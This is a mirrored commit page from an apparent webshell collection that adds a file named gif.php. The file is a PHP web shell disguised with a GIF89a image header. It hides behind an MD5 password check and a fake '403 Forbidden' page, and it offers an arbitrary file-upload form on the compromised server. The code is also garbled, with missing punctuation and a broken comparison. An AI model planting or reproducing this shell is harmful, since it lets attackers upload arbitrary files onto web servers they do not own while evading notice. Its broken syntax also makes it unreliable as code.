mirror of
https://github.com/tennc/webshell
synced 2025-02-18 02:38:24 +00:00
Create gif.php
from : http://pastebin.com/m9ja3Fhe back url : http://www.unphp.net/decode/adc92706379e34845bf898fc42e115b1/
This commit is contained in:
parent
e3d5a00869
commit
009d44de70
1 changed files with 16 additions and 0 deletions
16
php/gif.php
Normal file
16
php/gif.php
Normal file
|
@ -0,0 +1,16 @@
|
||||||
|
GIF89a1
|
||||||
|
error_reporting(NULL)
|
||||||
|
$me=$_SERVER['PHP_SELF']
|
||||||
|
$NameF=$_REQUEST['NameF']
|
||||||
|
$nowaddress='<input type=hidden name=address value="'.getcwd().'">'
|
||||||
|
$pass_up="a13756bf1e2bd46921c135232774fc5f"
|
||||||
|
if (isset($_FILES["elif"]) and
|
||||||
|
$_FILES["elif"]["error"] )
|
||||||
|
move_uploaded_file($_FILES["elif"]["tmp_name"], $_FILES["elif"]["name"])
|
||||||
|
echo $ifupload=" ItsOk "
|
||||||
|
if(md5($_REQUEST['ssp'])
|
||||||
|
=$pass_up)
|
||||||
|
print "<title>403 Forbidden</title><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server </p>"
|
||||||
|
exit()
|
||||||
|
$_SESSION['LoGiN']=true
|
||||||
|
echo "<form action=$me method=post enctype=multipart/form-data> $nowaddress <input type=file name=elif ><input type=submit value=Upload /></form>"
|
After Width: | Height: | Size: 703 B |
Loading…
Add table
Reference in a new issue